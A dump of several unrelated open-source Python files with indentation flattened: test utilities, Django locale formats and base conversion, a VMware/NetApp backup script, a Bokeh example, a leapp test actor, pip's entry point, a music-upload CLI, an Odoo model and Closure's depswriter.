os.makedirs(d)
assert path.isdir(d) and not path.islink(d)
return d
def touch(self, *parts):
d = self.makedirs(*parts[:-1])
f = path.join(d, parts[-1])
assert not path.exists(f)
open(f, 'w').close()
assert path.isfile(f) and not path.islink(f)
return f
def write(self, content, *parts):
d = self.makedirs(*parts[:-1])
f = path.join(d, parts[-1])
assert not path.exists(f)
open(f, 'w').write(content)
assert path.isfile(f) and not path.islink(f)
return f
def join(self, *parts):
return path.join(self.path, *parts)
def __del__(self):
self.rmtree()
class TempHome(TempDir):
def __init__(self):
super(TempHome, self).__init__()
self.__home = os.environ['HOME']
os.environ['HOME'] = self.path
class ExceptionNotRaised(Exception):
"""
Exception raised when an *expected* exception is *not* raised during a
unit test.
"""
msg = 'expected %s'
def __init__(self, expected):
self.expected = expected
def __str__(self):
return self.msg % self.expected.__name__
def assert_equal(val1, val2):
"""
Assert ``val1`` and ``val2`` are the same type and of equal value.
"""
assert type(val1) is type(val2), '%r != %r' % (val1, val2)
assert val1 == val2, '%r != %r' % (val1, val2)
def assert_not_equal(val1, val2):
"""
Assert ``val1`` and ``val2`` are the same type and of non-equal value.
"""
assert type(val1) is type(val2), '%r != %r' % (val1, val2)
assert val1 != val2, '%r == %r' % (val1, val2)
class Fuzzy(object):
"""
Perform a fuzzy (non-strict) equality tests.
`Fuzzy` instances will likely be used when comparing nesting data-structures
using `assert_deepequal()`.
By default a `Fuzzy` instance is equal to everything. For example, all of
these evaluate to ``True``:
>>> Fuzzy() == False
True
>>> 7 == Fuzzy() # Order doesn't matter
True
>>> Fuzzy() == u'Hello False, Lucky 7!'
True
The first optional argument *regex* is a regular expression pattern to
match. For example, you could match a phone number like this:
>>> phone = Fuzzy('^\d{3}-\d{3}-\d{4}$')
>>> u'123-456-7890' == phone
True
Use of a regular expression by default implies the ``unicode`` type, so
comparing with an ``str`` instance will evaluate to ``False``:
>>> phone.type
<type 'unicode'>
>>> '123-456-7890' == phone
False
The *type* kwarg allows you to specify a type constraint, so you can force
the above to work on ``str`` instances instead:
>>> '123-456-7890' == Fuzzy('^\d{3}-\d{3}-\d{4}$', type=str)
True
You can also use the *type* constraint on its own without the *regex*, for
example:
>>> 42 == Fuzzy(type=int)
True
>>> 42.0 == Fuzzy(type=int)
False
>>> 42.0 == Fuzzy(type=(int, float))
True
Finally the *test* kwarg is an optional callable that will be called to
perform the loose equality test. For example:
>>> 42 == Fuzzy(test=lambda other: other > 42)
False
>>> 43 == Fuzzy(test=lambda other: other > 42)
True
You can use *type* and *test* together. For example:
>>> 43 == Fuzzy(type=float, test=lambda other: other > 42)
False
>>> 42.5 == Fuzzy(type=float, test=lambda other: other > 42)
True
The *regex*, *type*, and *test* kwargs are all availabel via attributes on
the `Fuzzy` instance:
>>> fuzzy = Fuzzy('.+', type=str, test=lambda other: True)
>>> fuzzy.regex
'.+'
>>> fuzzy.type
<type 'str'>
>>> fuzzy.test # doctest:+ELLIPSIS
<function <lambda> at 0x...>
To aid debugging, `Fuzzy.__repr__()` revealse these kwargs as well:
>>> fuzzy # doctest:+ELLIPSIS
Fuzzy('.+', <type 'str'>, <function <lambda> at 0x...>)
"""
def __init__(self, regex=None, type=None, test=None):
"""
Initialize.
:param regex: A regular expression pattern to match, e.g.
``u'^\d+foo'``
:param type: A type or tuple of types to test using ``isinstance()``,
e.g. ``(int, float)``
:param test: A callable used to perform equality test, e.g.
``lambda other: other >= 18``
"""
assert regex is None or isinstance(regex, basestring)
assert test is None or callable(test)
if regex is None:
self.re = None
else:
self.re = re.compile(regex)
if type is None:
type = unicode
assert type in (unicode, str, basestring)
self.regex = regex
self.type = type
self.test = test
def __repr__(self):
return '%s(%r, %r, %r)' % (
self.__class__.__name__, self.regex, self.type, self.test
)
def __eq__(self, other):
if not (self.type is None or isinstance(other, self.type)):
return False
if not (self.re is None or self.re.search(other)):
return False
if not (self.test is None or self.test(other)):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
VALUE = """assert_deepequal: expected != got.
%s
expected = %r
got = %r
path = %r"""
TYPE = """assert_deepequal: type(expected) is not type(got).
%s
type(expected) = %r
type(got) = %r
expected = %r
got = %r
path = %r"""
LEN = """assert_deepequal: list length mismatch.
%s
len(expected) = %r
len(got) = %r
expected = %r
got = %r
path = %r"""
KEYS = """assert_deepequal: dict keys mismatch.
%s
missing keys = %r
extra keys = %r
expected = %r
got = %r
path = %r"""
def assert_deepequal(expected, got, doc='', stack=tuple()):
"""
Recursively check for type and equality.
If a value in expected is callable then it will used as a callback to
test for equality on the got value. The callback is passed the got
value and returns True if equal, False otherwise.
If the tests fails, it will raise an ``AssertionError`` with detailed
information, including the path to the offending value. For example:
>>> expected = [u'Hello', dict(world=u'how are you?')]
>>> got = [u'Hello', dict(world='how are you?')]
>>> expected == got
True
>>> assert_deepequal(expected, got, doc='Testing my nested data')
Traceback (most recent call last):
...
AssertionError: assert_deepequal: type(expected) is not type(got).
Testing my nested data
type(expected) = <type 'unicode'>
type(got) = <type 'str'>
expected = u'how are you?'
got = 'how are you?'
path = (0, 'world')
Note that lists and tuples are considered equivalent, and the order of
their elements does not matter.
"""
if isinstance(expected, tuple):
expected = list(expected)
if isinstance(got, tuple):
got = list(got)
if isinstance(expected, DN):
if isinstance(got, basestring):
got = DN(got)
if not (isinstance(expected, Fuzzy) or callable(expected) or type(expected) is type(got)):
raise AssertionError(
TYPE % (doc, type(expected), type(got), expected, got, stack)
)
if isinstance(expected, (list, tuple)):
if len(expected) != len(got):
raise AssertionError(
LEN % (doc, len(expected), len(got), expected, got, stack)
)
s_got = sorted(got)
s_expected = sorted(expected)
for (i, e_sub) in enumerate(s_expected):
g_sub = s_got[i]
assert_deepequal(e_sub, g_sub, doc, stack + (i,))
elif isinstance(expected, dict):
missing = set(expected).difference(got)
extra = set(got).difference(expected)
if missing or extra:
raise AssertionError(KEYS % (
doc, sorted(missing), sorted(extra), expected, got, stack
)
)
for key in sorted(expected):
e_sub = expected[key]
g_sub = got[key]
assert_deepequal(e_sub, g_sub, doc, stack + (key,))
elif callable(expected):
if not expected(got):
raise AssertionError(
VALUE % (doc, expected, got, stack)
)
elif expected != got:
raise AssertionError(
VALUE % (doc, expected, got, stack)
)
def raises(exception, callback, *args, **kw):
"""
Tests that the expected exception is raised; raises ExceptionNotRaised
if test fails.
"""
raised = False
try:
callback(*args, **kw)
except exception, e:
raised = True
if not raised:
raise ExceptionNotRaised(exception)
return e
def getitem(obj, key):
"""
Works like getattr but for dictionary interface. Use this in combination
with raises() to test that, for example, KeyError is raised.
"""
return obj[key]
def setitem(obj, key, value):
"""
Works like setattr but for dictionary interface. Use this in combination
with raises() to test that, for example, TypeError is raised.
"""
obj[key] = value
def delitem(obj, key):
"""
Works like delattr but for dictionary interface. Use this in combination
with raises() to test that, for example, TypeError is raised.
"""
del obj[key]
def no_set(obj, name, value='some_new_obj'):
"""
Tests that attribute cannot be set.
"""
raises(AttributeError, setattr, obj, name, value)
def no_del(obj, name):
"""
Tests that attribute cannot be deleted.
"""
raises(AttributeError, delattr, obj, name)
def read_only(obj, name, value='some_new_obj'):
"""
Tests that attribute is read-only. Returns attribute.
"""
# Test that it cannot be set:
no_set(obj, name, value)
# Test that it cannot be deleted:
no_del(obj, name)
# Return the attribute
return getattr(obj, name)
def is_prop(prop):
return type(prop) is property
class ClassChecker(object):
__cls = None
__subcls = None
def __get_cls(self):
if self.__cls is None:
self.__cls = self._cls
assert inspect.isclass(self.__cls)
return self.__cls
cls = property(__get_cls)
def __get_subcls(self):
if self.__subcls is None:
self.__subcls = self.get_subcls()
assert inspect.isclass(self.__subcls)
return self.__subcls
subcls = property(__get_subcls)
def get_subcls(self):
raise NotImplementedError(
self.__class__.__name__,
'get_subcls()'
)
def tearDown(self):
"""
nose tear-down fixture.
"""
context.__dict__.clear()
def check_TypeError(value, type_, name, callback, *args, **kw):
"""
Tests a standard TypeError raised with `errors.raise_TypeError`.
"""
e = raises(TypeError, callback, *args, **kw)
assert e.value is value
assert e.type is type_
assert e.name == name
assert type(e.name) is str
assert str(e) == ipalib.errors.TYPE_ERROR % (name, type_, value)
return e
def get_api(**kw):
"""
Returns (api, home) tuple.
This function returns a tuple containing an `ipalib.plugable.API`
instance and a `TempHome` instance.
"""
home = TempHome()
api = ipalib.create_api(mode='unit_test')
api.env.in_tree = True
for (key, value) in kw.iteritems():
api.env[key] = value
return (api, home)
def create_test_api(**kw):
"""
Returns (api, home) tuple.
This function returns a tuple containing an `ipalib.plugable.API`
instance and a `TempHome` instance.
"""
home = TempHome()
api = ipalib.create_api(mode='unit_test')
api.env.in_tree = True
for (key, value) in kw.iteritems():
api.env[key] = value
return (api, home)
class PluginTester(object):
__plugin = None
def __get_plugin(self):
if self.__plugin is None:
self.__plugin = self._plugin
assert issubclass(self.__plugin, Plugin)
return self.__plugin
plugin = property(__get_plugin)
def register(self, *plugins, **kw):
"""
Create a testing api and register ``self.plugin``.
This method returns an (api, home) tuple.
:param plugins: Additional \*plugins to register.
:param kw: Additional \**kw args to pass to `create_test_api`.
"""
(api, home) = create_test_api(**kw)
api.register(self.plugin)
for p in plugins:
api.register(p)
return (api, home)
def finalize(self, *plugins, **kw):
(api, home) = self.register(*plugins, **kw)
api.finalize()
return (api, home)
def instance(self, namespace, *plugins, **kw):
(api, home) = self.finalize(*plugins, **kw)
o = api[namespace][self.plugin.__name__]
return (o, api, home)
def tearDown(self):
"""
nose tear-down fixture.
"""
context.__dict__.clear()
class dummy_ugettext(object):
__called = False
def __init__(self, translation=None):
if translation is None:
translation = u'The translation'
self.translation = translation
assert type(self.translation) is unicode
def __call__(self, message):
assert self.__called is False
self.__called = True
assert type(message) is str
assert not hasattr(self, 'message')
self.message = message
assert type(self.translation) is unicode
return self.translation
def called(self):
return self.__called
def reset(self):
assert type(self.translation) is unicode
assert type(self.message) is str
del self.message
assert self.__called is True
self.__called = False
class dummy_ungettext(object):
__called = False
def __init__(self):
self.translation_singular = u'The singular translation'
self.translation_plural = u'The plural translation'
def __call__(self, singular, plural, n):
assert type(singular) is str
assert type(plural) is str
assert type(n) is int
assert self.__called is False
self.__called = True
self.singular = singular
self.plural = plural
self.n = n
if n == 1:
return self.translation_singular
return self.translation_plural
class DummyMethod(object):
def __init__(self, callback, name):
self.__callback = callback
self.__name = name
def __call__(self, *args, **kw):
return self.__callback(self.__name, args, kw)
class DummyClass(object):
def __init__(self, *calls):
self.__calls = calls
self.__i = 0
for (name, args, kw, result) in calls:
method = DummyMethod(self.__process, name)
setattr(self, name, method)
def __process(self, name_, args_, kw_):
if self.__i >= len(self.__calls):
raise AssertionError(
'extra call: %s, %r, %r' % (name_, args_, kw_)
)
(name, args, kw, result) = self.__calls[self.__i]
self.__i += 1
i = self.__i
if name_ != name:
raise AssertionError(
'call %d should be to method %r; got %r' % (i, name, name_)
)
if args_ != args:
raise AssertionError(
'call %d to %r should have args %r; got %r' % (i, name, args, args_)
)
if kw_ != kw:
raise AssertionError(
'call %d to %r should have kw %r, got %r' % (i, name, kw, kw_)
)
if isinstance(result, Exception):
raise result
return result
def _calledall(self):
return self.__i == len(self.__calls)
|
saideepchandg/oracle-r12-accounting | refs/heads/master | lib/django/conf/locale/lv/formats.py | 115 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = r'Y. \g\a\d\a j. F'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = r'Y. \g\a\d\a j. F, H:i'
YEAR_MONTH_FORMAT = r'Y. \g. F'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = r'j.m.Y'
SHORT_DATETIME_FORMAT = 'j.m.Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = (
'%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y', # '2006-10-25', '25.10.2006', '25.10.06'
)
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
'%H.%M.%S', # '14.30.59'
'%H.%M.%S.%f', # '14.30.59.000200'
'%H.%M', # '14.30'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M:%S.%f', # '25.10.06 14:30:59.000200'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y %H.%M.%S', # '25.10.06 14.30.59'
'%d.%m.%y %H.%M.%S.%f', # '25.10.06 14.30.59.000200'
'%d.%m.%y %H.%M', # '25.10.06 14.30'
'%d.%m.%y', # '25.10.06'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = ' ' # Non-breaking space
NUMBER_GROUPING = 3
|
seattle-biomed/ontap-api-wrapper | refs/heads/master | examples/backup-vmware-netapp/backup-vmware-netapp.py | 2 | #!/opt/virtualenv/admintools/bin/python
import argparse
import functools
import pysphere
import re
import socket
import sys
import time
import yaml
# Load NetApp API wrapper:
sys.path.append('/opt/netapp-manageability-sdk-4.1/lib/python/NetApp')
import Ontap
def clean_vm_snaps(servers, vms_by_ds, datastore, skip_vms = [],
dry_run = False):
"""Given dict of VMs by datastore, clean VM snaps on server:datastore."""
for vmx in vms_by_ds[datastore].keys():
if skip_vms.count(vmx):
continue
v_print("Removing snapshot on %s..." % vmx, 3)
if not dry_run:
try:
vm = servers[vms_by_ds[datastore][vmx]].get_vm_by_path(vmx)
vm.delete_named_snapshot('backup')
except pysphere.resources.vi_exception.VIException:
v_print("Failed to remove snapshot on %s!" % vmx, 1)
v_print('Manual snapshot deletion may be required.', 2)
pass # continue on
v_print('done.', 3)
def set_mode_from_args():
"""
Parse command line arguments.
Return v_print, which sets output verbosity level.
"""
parser = argparse.ArgumentParser(
description='Coordinate VMware and NetApp backups.')
parser.add_argument('-n', '--noexec', action='store_true',
help='Dry run - do not create any snapshots')
parser.add_argument('-q', '--quiet', action='store_true',
help='Reduce output to only errors')
parser.add_argument('-v', '--verbose', action='store_true',
help='Produce verbose output')
args = parser.parse_args()
if args.verbose:
v_print = functools.partial(verbose_print, verbosity=3)
elif args.quiet:
v_print = functools.partial(verbose_print, verbosity=1)
else:
v_print = functools.partial(verbose_print, verbosity=2)
if args.noexec:
dry_run = True
else:
dry_run = False
return (v_print, dry_run)
def verbose_print(output, level, verbosity=2):
"""
Print output (or not) depending on level of verbosity.
verbosity level 3 prints all messages
verbosity level 2 prints only warning or error messages
verbosity level 1 prints only error messages
"""
if level <= verbosity:
now = time.strftime("%b %d %H:%M:%S", time.localtime())
print now, output
if __name__ == '__main__':
"""
Coordinate VMware snapshots with NetApp SnapVault snapshots.
Required NetApp role permissions: login-http-admin,
api-system-get-version, api-snapvault-primary-initiate-snapshot-create,
api-volume-list-info, api-snapvault-secondary-initiate-snapshot-create
Required vSphere role permissions:
-Virtual machine: State: Create snapshot
-Virtual machine: State: Remove snapshot
"""
# Parse arguments:
(v_print, dry_run) = set_mode_from_args()
# Gather authentication info
f = open('/opt/ops-scripts/etc/vmware-netapp-backup-auth.yaml')
auth = yaml.load(f.read())
f.close()
# Read VMware datastore to NetApp volume mapping configuration:
f = open('/opt/ops-scripts/etc/vmware-netapp-backup-config.yaml')
config = yaml.load(f.read())
f.close()
# Connect to NetApp filers:
filers = {}
for filer in auth['filers']:
v_print("Connecting to filer %s" % filer['hostname'], 3)
filers[filer['hostname']] = Ontap.Filer(filer['hostname'],
filer['user'],
filer['passwd'])
# Connect to all vSphere instances:
servers = {}
for vcenter in auth['vcenter']:
vc = pysphere.VIServer()
v_print("Connecting to vCenter host %s" % vcenter['hostname'], 3)
try:
vc.connect(vcenter['hostname'], vcenter['user'], vcenter['passwd'])
except socket.error:
v_print("Could not connect to vCenter host %s" %
vcenter['hostname'], 1)
continue
servers[vcenter['hostname']] = vc
# Generate dict of VMs by datastore:
vms_by_ds = {}
for vchost in servers.keys():
v_print("Cataloging vCenter host %s" % vchost, 3)
server = servers[vchost]
vmlist = server.get_registered_vms()
for vmx in vmlist:
match = re.search(r'^\[(.*)\] (\S+)$', vmx)
if match:
datastore = match.groups()[0]
if not vms_by_ds.has_key(datastore):
vms_by_ds[datastore] = {}
vms_by_ds[datastore][vmx] = vchost
#
# Do backups per datastore to optimize performance
#
for datastore in config['datastores']:
v_print("Snapping contents of %s" % datastore['name'], 3)
# Track off VMs - don't try to snap them:
off_vms = []
if not vms_by_ds.has_key(datastore['name']):
v_print("No VMs found in %s" % datastore['name'], 3)
continue
#
# Take VMware VM-level snapshots
#
for vmx in vms_by_ds[datastore['name']].keys():
try:
vm = servers[vms_by_ds[datastore['name']][vmx]].get_vm_by_path(vmx)
except pysphere.resources.vi_exception.VIException as e:
v_print("Failed to get_vm with %s!" % vmx, 1)
v_print("Exception detail: %s" % e, 1)
v_print("Expected VM to be on host %s" %
vms_by_ds[datastore['name']][vmx], 2)
v_print("%s will not get a VMware snapshot." % vmx, 2)
del vms_by_ds[datastore['name']][vmx]
continue
# Skip off VMs:
if vm.get_status() == 'POWERED OFF':
v_print("%s is off - will not take VMware snap" % vmx, 3)
off_vms.append(vmx)
continue
v_print("Snapping %s..." % vmx, 3)
if not dry_run:
try:
vm.create_snapshot('backup', memory=False, quiesce=True)
except pysphere.resources.vi_exception.VIException:
v_print("Failed to snap %s!" % vmx, 1)
pass # bravely march on
v_print('done.', 3)
#
# Take NetApp snapshot
#
try:
pri_vol = filers[datastore['primary']].get_volume(
datastore['pri_vol'])
v_print("Snapping %s..." % datastore['pri_vol'], 3)
if not dry_run:
pri_vol.snapvault_primary_snap('sv_daily')
v_print('done.', 3)
except Ontap.OntapApiException as e:
v_print('FAILURE: Exiting due to OntapApiException', 1)
# Clean up snapshots on the way out the door:
clean_vm_snaps(servers, vms_by_ds, datastore['name'],
off_vms)
v_print("Code: %s - %s" % (e.errno, e.reason), 2)
raise
except:
raise
#
# Remove VMware VM-level snapshots
#
clean_vm_snaps(servers, vms_by_ds, datastore['name'], off_vms,
dry_run)
#
# Send NetApp snapshots to SnapVault secondary, where configured
#
for datastore in config['datastores']:
if datastore.has_key('secondary'):
sec_vol = filers[datastore['secondary']].get_volume(
datastore['sec_vol'])
if sec_vol is False:
v_print("Secondary volume %s does not exist on %s!" %
(datastore['sec_vol'],
filers[datastore['secondary']].name),
1)
continue
v_print("Initiating transfer to %s" % datastore['sec_vol'], 3)
if not dry_run:
sec_vol.snapvault_secondary_snap('sv_daily')
v_print('done.', 3)
if not dry_run:
v_print('Sleeping for 600 seconds.', 3)
time.sleep(600)
|
ericdill/bokeh | refs/heads/master | examples/charts/server/line_animate.py | 37 | # The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
from collections import OrderedDict
import time
import numpy as np
from bokeh.charts import Line, curdoc, cursession, output_server, show
from bokeh.models import GlyphRenderer
N = 80
x = np.linspace(0, 4*np.pi, N)
xyvalues = OrderedDict(sin=np.sin(x), cos=np.cos(x))
output_server("line_animate")
chart = Line(xyvalues, title="Lines", ylabel='measures')
curdoc().add(chart)
show(chart)
renderer = chart.select(dict(type=GlyphRenderer))
ds = renderer[0].data_source
while True:
for i in np.hstack((np.linspace(1, -1, 100), np.linspace(-1, 1, 100))):
for k, values in xyvalues.items():
if k != 'x':
ds.data['y_%s'%k] = values * i
cursession().store_objects(ds)
time.sleep(0.05)
|
silenceli/nova | refs/heads/master | nova/api/openstack/compute/views/__init__.py | 12133432 | |
teemulehtinen/a-plus | refs/heads/master | external_services/migrations/__init__.py | 12133432 | |
Tejal011089/huntercamp_erpnext | refs/heads/develop | erpnext/buying/report/supplier_addresses_and_contacts/__init__.py | 12133432 | |
leapp-to/prototype | refs/heads/master | tests/data/workflow-tests/actors/firstactor/actor.py | 1 | import os
from leapp.actors import Actor
from leapp.dialogs import Dialog
from leapp.dialogs.components import BooleanComponent
from leapp.tags import FirstPhaseTag, UnitTestWorkflowTag
class FirstActor(Actor):
name = 'first_actor'
description = 'No description has been provided for the first_actor actor.'
consumes = ()
produces = ()
tags = (FirstPhaseTag, UnitTestWorkflowTag)
dialogs = (
Dialog(
scope='unique_dialog_scope',
reason='Confirmation',
components=(
BooleanComponent(
key='confirm',
label='Disable a deprecated module?'
'If no, the upgrade process will be interrupted.',
default=False,
description='Module XXX is no longer available '
'in RHEL-8 since it was replaced by shiny-metal-XXX.',
reason='Leaving this module in system configuration may lock out the system.'
),
)
),)
def process(self):
from leapp.libraries.common.test_helper import log_execution
log_execution(self)
if not self.configuration or self.configuration.value != 'unit-test':
self.report_error('Unit test failed due missing or invalid workflow provided configuration')
if os.environ.get('FirstActor-ReportError') == '1':
self.report_error("Unit test requested error")
self.get_answers(self.dialogs[0]).get('confirm', False)
|
FlintHill/SUAS-Competition | refs/heads/master | env/lib/python2.7/site-packages/pip/__main__.py | 38 | from __future__ import absolute_import
import os
import sys
# If we are running from a wheel, add the wheel to sys.path
# This allows the usage python pip-*.whl/pip install pip-*.whl
if __package__ == '':
# __file__ is pip-*.whl/pip/__main__.py
# first dirname call strips of '/__main__.py', second strips off '/pip'
# Resulting path is the name of the wheel itself
# Add that to sys.path so we can import pip
path = os.path.dirname(os.path.dirname(__file__))
sys.path.insert(0, path)
from pip._internal import main as _main # isort:skip # noqa
if __name__ == '__main__':
sys.exit(_main())
|
forblackking/PyBiu | refs/heads/master | run.py | 1 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @author:Hieda no Chiaki <i@wind.moe>
import getopt
import os
import sys
import logging
from src.init import init, usage
from src.md5 import md5
from src.post import post_biu, confirm
from src.dir import que
try:
import configparser
import queue
except ImportError:
import ConfigParser
from Queue import Queue
logging.basicConfig(level=logging.INFO)
if len(sys.argv) == 1:
"""检察上传环境"""
logging.info("Checking System Environments...")
try:
import requests
except:
logging.info('Please install requests. [pip install requests]')
exit(1)
init()
# 重试三次 如果无法连接则抛出网络异常
logging.info("Connect to Biu.moe...")
for i in range(0, 3):
try:
r = requests.get('http://biu.moe/', timeout=3)
if r.status_code != 200:
raise ValueError()
break
except Exception as e:
if i == 2:
logging.info("Fail. Please check your internet connection.")
exit(1)
continue
logging.info("Success.")
else:
try:
opts, args = getopt.getopt(sys.argv[1:], "hvf:d:", ["update"])
except getopt.GetoptError:
sys.exit()
for argv, value in opts:
if argv in "-f":
file = value
if not os.path.exists(file):
file = os.path.split(os.path.realpath(__file__))[0] + file
logging.info(file)
if not os.path.exists(file):
logging.info("找不到文件.请尝试用双引号将文件绝对路径包括起来.")
else:
logging.info("test")
flag, token, title = post_biu(file)
sys.exit() if not flag else confirm(title, file, md5(file, "file"), token)
pass
else:
if file[0] != "\"":
file = "\"" + file + "\""
flag, token, title = post_biu(file)
if not flag == 1:
sys.exit()
else:
confirm(title, file, md5(file, "file"), token)
pass
elif argv in "-d": #上传文件夹
path = value
if os.path.isdir(path):
cnt = 0
q = que(path)
try:
task_queue = Queue()
except:
task_queue = queue.Queue()
if not q.empty():
logging.info("可以直接上传的歌曲列表")
while not q.empty():
info = q.get()
logging.info(info[1])
task_queue.put(info)
else:
print("上传队列为空,请检查目录的合法文件")
sys.exit()
logging.info("请确认是否开始批量上传 Y/N")
try:
choose = raw_input()
except NameError:
choose = input()
if choose in ["Y", "y"]:
while not task_queue.empty():
task = task_queue.get()
confirm(task[1], task[2], md5(task[2], "file"), task[0], auto=1)
else:
logging.info("取消批量上传.")
pass
else:
logging.info("您输入了非法的文件夹路径,请尝试重新输入")
pass
pass
elif argv in "-v":
try:
config = configparser.ConfigParser()
config.read_file(open('./.env'))
except:
config = ConfigParser.ConfigParser()
config.readfp(open('./.env'))
version = config.get("Environment", "VERSION")
logging.info(version)
elif argv in "-h":
usage()
sys.exit()
else:
pass
for argv in args:
if argv in "update":
logging.info("update")
elif argv in "test":
logging.info("test.")
else:
pass
|
Innovahn/odoo.old | refs/heads/master | addons/web_tests_demo/__init__.py | 423 | from openerp.osv import orm, fields
class TestObject(orm.TransientModel):
_name = 'web_tests_demo.model'
_columns = {
'name': fields.char("Name", required=True),
'thing': fields.char("Thing"),
'other': fields.char("Other", required=True)
}
_defaults = {
'other': "bob"
}
|
auready/django | refs/heads/master | django/utils/baseconv.py | 129 | # Copyright (c) 2010 Guilherme Gondim. All rights reserved.
# Copyright (c) 2009 Simon Willison. All rights reserved.
# Copyright (c) 2002 Drew Perttula. All rights reserved.
#
# License:
# Python Software Foundation License version 2
#
# See the file "LICENSE" for terms & conditions for usage, and a DISCLAIMER OF
# ALL WARRANTIES.
#
# This Baseconv distribution contains no GNU General Public Licensed (GPLed)
# code so it may be used in proprietary projects just like prior ``baseconv``
# distributions.
#
# All trademarks referenced herein are property of their respective holders.
#
"""
Convert numbers from base 10 integers to base X strings and back again.
Sample usage::
>>> base20 = BaseConverter('0123456789abcdefghij')
>>> base20.encode(1234)
'31e'
>>> base20.decode('31e')
1234
>>> base20.encode(-1234)
'-31e'
>>> base20.decode('-31e')
-1234
>>> base11 = BaseConverter('0123456789-', sign='$')
>>> base11.encode('$1234')
'$-22'
>>> base11.decode('$-22')
'$1234'
"""
BASE2_ALPHABET = '01'
BASE16_ALPHABET = '0123456789ABCDEF'
BASE56_ALPHABET = '23456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz'
BASE36_ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyz'
BASE62_ALPHABET = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
BASE64_ALPHABET = BASE62_ALPHABET + '-_'
class BaseConverter:
decimal_digits = '0123456789'
def __init__(self, digits, sign='-'):
self.sign = sign
self.digits = digits
if sign in self.digits:
raise ValueError('Sign character found in converter base digits.')
def __repr__(self):
return "<%s: base%s (%s)>" % (self.__class__.__name__, len(self.digits), self.digits)
def encode(self, i):
neg, value = self.convert(i, self.decimal_digits, self.digits, '-')
if neg:
return self.sign + value
return value
def decode(self, s):
neg, value = self.convert(s, self.digits, self.decimal_digits, self.sign)
if neg:
value = '-' + value
return int(value)
def convert(self, number, from_digits, to_digits, sign):
if str(number)[0] == sign:
number = str(number)[1:]
neg = 1
else:
neg = 0
# make an integer out of the number
x = 0
for digit in str(number):
x = x * len(from_digits) + from_digits.index(digit)
# create the result in base 'len(to_digits)'
if x == 0:
res = to_digits[0]
else:
res = ''
while x > 0:
digit = x % len(to_digits)
res = to_digits[digit] + res
x = int(x // len(to_digits))
return neg, res
base2 = BaseConverter(BASE2_ALPHABET)
base16 = BaseConverter(BASE16_ALPHABET)
base36 = BaseConverter(BASE36_ALPHABET)
base56 = BaseConverter(BASE56_ALPHABET)
base62 = BaseConverter(BASE62_ALPHABET)
base64 = BaseConverter(BASE64_ALPHABET, sign='$')
|
sdale28/Habitica-App | refs/heads/master | node_modules/accessibility-developer-tools/lib/closure-library/closure/bin/build/depswriter.py | 76 | #!/usr/bin/env python
#
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates out a Closure deps.js file given a list of JavaScript sources.
Paths can be specified as arguments or (more commonly) specifying trees
with the flags (call with --help for descriptions).
Usage: depswriter.py [path/to/js1.js [path/to/js2.js] ...]
"""
import json
import logging
import optparse
import os
import posixpath
import shlex
import sys
import source
import treescan
__author__ = 'nnaze@google.com (Nathan Naze)'
def MakeDepsFile(source_map):
"""Make a generated deps file.
Args:
source_map: A dict map of the source path to source.Source object.
Returns:
str, A generated deps file source.
"""
# Write in path alphabetical order
paths = sorted(source_map.keys())
lines = []
for path in paths:
js_source = source_map[path]
# We don't need to add entries that don't provide anything.
if js_source.provides:
lines.append(_GetDepsLine(path, js_source))
return ''.join(lines)
def _GetDepsLine(path, js_source):
"""Get a deps.js file string for a source."""
provides = _ToJsSrc(sorted(js_source.provides))
requires = _ToJsSrc(sorted(js_source.requires))
module = 'true' if js_source.is_goog_module else 'false'
return 'goog.addDependency(\'%s\', %s, %s, %s);\n' % (
path, provides, requires, module)
def _ToJsSrc(arr):
"""Convert a python arr to a js source string."""
return json.dumps(arr).replace('"', '\'')
def _GetOptionsParser():
"""Get the options parser."""
parser = optparse.OptionParser(__doc__)
parser.add_option('--output_file',
dest='output_file',
action='store',
help=('If specified, write output to this path instead of '
'writing to standard output.'))
parser.add_option('--root',
dest='roots',
default=[],
action='append',
help='A root directory to scan for JS source files. '
'Paths of JS files in generated deps file will be '
'relative to this path. This flag may be specified '
'multiple times.')
parser.add_option('--root_with_prefix',
dest='roots_with_prefix',
default=[],
action='append',
help='A root directory to scan for JS source files, plus '
'a prefix (if either contains a space, surround with '
'quotes). Paths in generated deps file will be relative '
'to the root, but preceded by the prefix. This flag '
'may be specified multiple times.')
parser.add_option('--path_with_depspath',
